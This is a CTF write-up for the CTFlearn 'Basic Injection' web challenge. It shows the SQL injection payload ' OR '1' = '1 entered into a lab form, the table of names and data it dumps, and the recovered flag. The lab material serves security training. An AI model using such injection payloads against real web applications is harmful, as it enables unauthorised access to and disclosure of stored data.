CTFlearn-Writeups/Web/Basic Injection
rishitsaiya 53fd30619d Added CTFlearn writeups 2020-07-31 18:48:25 +05:30
..
README.md Added CTFlearn writeups 2020-07-31 18:48:25 +05:30

README.md

Basic Injection

The main idea finding the flag using basic SQL Injections to insecure web page.

Step-1:

After we go to the given URL https://web.ctflearn.com/web4/, we are asked to submit something.

Step-2:

Inspect Element the blank and try to check the code.

We find a line there.

<!-- Try some names like Hiroki, Noah, Luke -->

Step-3:

When you try all of them, none of them give the flag. So try basic SQL payloads the existing database.

I tried ' OR '1' = '1

I got the following output.

Name: Luke  
Data: I made this problem.  
Name: Alec  
Data: Steam boys.  
Name: Jalen  
Data: Pump that iron fool.  
Name: Eric  
Data: I make cars.  
Name: Sam  
Data: Thinks he knows SQL.  
Name: fl4g__giv3r  
Data: th4t_is_why_you_n33d_to_sanitiz3_inputs  
Name: snoutpop  
Data: jowls  
Name: Chunbucket  
Data: @datboiiii

Step-4:

Finally the flag becomes: th4t_is_why_you_n33d_to_sanitiz3_inputs